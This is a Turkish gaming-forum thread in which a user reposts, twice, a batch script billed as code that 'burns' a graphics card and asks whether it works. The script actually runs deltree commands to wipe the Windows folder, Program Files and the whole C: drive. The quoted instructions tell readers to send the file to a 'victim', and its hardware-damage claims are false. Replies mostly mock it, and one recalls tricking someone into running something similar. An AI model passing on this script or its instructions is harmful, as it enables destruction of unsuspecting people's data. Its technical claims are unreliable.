• Forum vBulletin altyapısından Xenforo altyapısına geçirildi, bu sebeple eski şifreleriniz ile foruma giriş yapamayacaksınız, parolamı unuttum adımından mailiniz ile şifre sıfırlayarak giriş yapabilirsiniz.

Üyeliklerinde geçerli bir mail adresi olmadığı için sıfırlama yapamayacak kullanıcılar forum kullanıcı adlarını ve yeni şifrelerini yazarak info@maxigame.org adresine şifre sıfırlamak istediklerine dair bir mail göndersinler şifrelerini sıfırlayıp mail adreslerini güncelleyeceğiz. Şifreniz sıfırlandıktan sonra foruma giriş yapıp tekrar istediğiniz gibi değiştirebilirsiniz.

mümkünmüdür ?

Keep Calm Party On

Daimi Üye
Aktiflik
K.Tarihi
17 Ağu 2013
Puanı
4
EKRAN KARTI YAKAN KOD

Kod:
@echo off
C:WINDOWSCOMMANDdeltree /y c:windows*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:Progra~1*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:*.*
@echo off
cls
cls
@echo .:: HacKeD gülümse ::.
@echo off3.

METİN SAYFASI AÇIP
kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By MaNNeR_Boi yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin.

bir forumda bu codu buldum gercikcilik payi nedir dogrumudur acaba ?

Kod falan bilmiyorum ama 2008 yılında buna benzer bir şey bulmuştum. MySro'dan gıcık olduğum çocuğa bin türlü hile hurda ile açtırdım,işlemcim yandı falan filan diyordu :D

Ama bu çalışmaz be :D

EKRAN KARTI YAKAN KOD

Kod:
@echo off
C:WINDOWSCOMMANDdeltree /y c:windows*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:Progra~1*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:*.*
@echo off
cls
cls
@echo .:: HacKeD gülümse ::.
@echo off3.

METİN SAYFASI AÇIP
kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By MaNNeR_Boi yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin.

bir forumda bu codu buldum gercikcilik payi nedir dogrumudur acaba ?

Bize soracağına kendin dene bir zahmet, işe yararsa yeni ekran kartı aldığında sonucu yazarsın, bekleriz yani acelemiz yok :D

Artik eprom entegre kullanimi azaldi ve eeprom a gecildi bir ara tekrar voltaj ayarlama acigi vardi ruslar bulmustu gibi 2006 dan bu yana etkili dehil sanirsam :confused:

Geri